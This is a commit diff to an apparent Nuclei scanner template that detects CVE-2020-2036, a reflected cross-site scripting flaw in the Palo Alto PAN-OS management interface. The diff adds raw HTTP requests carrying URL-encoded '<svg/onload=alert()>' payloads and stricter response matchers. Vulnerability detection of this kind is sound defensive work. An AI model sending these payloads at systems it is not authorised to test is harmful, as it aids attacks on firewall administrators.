Update CVE-2020-2036.yaml

2023-08-01 07:56:42 +08:00 · 2023-08-01 07:56:42 +08:00 · bfc27c95d8
parent d6d46d7208
commit bfc27c95d8
1 changed files with 23 additions and 18 deletions
--- a/http/cves/2020/CVE-2020-2036.yaml
+++ b/http/cves/2020/CVE-2020-2036.yaml
@ -2,7 +2,7 @@ id: CVE-2020-2036

 info:
  name: Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting
-  author: madrobot
+  author: madrobot,j4vaovo
  severity: high
  description: |
    PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.
@ -18,31 +18,36 @@ info:
    epss-score: 0.0109
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
  metadata:
-    max-request: 2
+    max-request: 3
    vendor: paloaltonetworks
    product: pan-os
  tags: cve,cve2020,vpn,xss

 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
-      - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
+  - raw:
+      - |
+        GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(7331)%3E HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(7331)%3E HTTP/1.1
+        Host: {{Hostname}}

    stop-at-first-match: true

    matchers-condition: and
    matchers:
-      - type: word
-        part: body
-        words:
-          - "<svg/onload=alert(1)>"
+      - type: dsl
+        dsl:
+          - "!contains(tolower(body_1), '<svg/onload=alert(1337)>')"
+        condition: and

-      - type: word
-        part: header
-        words:
-          - "text/html"
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '<svg/onload=alert(7331)>')"
+          - "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '<svg/onload=alert(7331)>')"
+        condition: or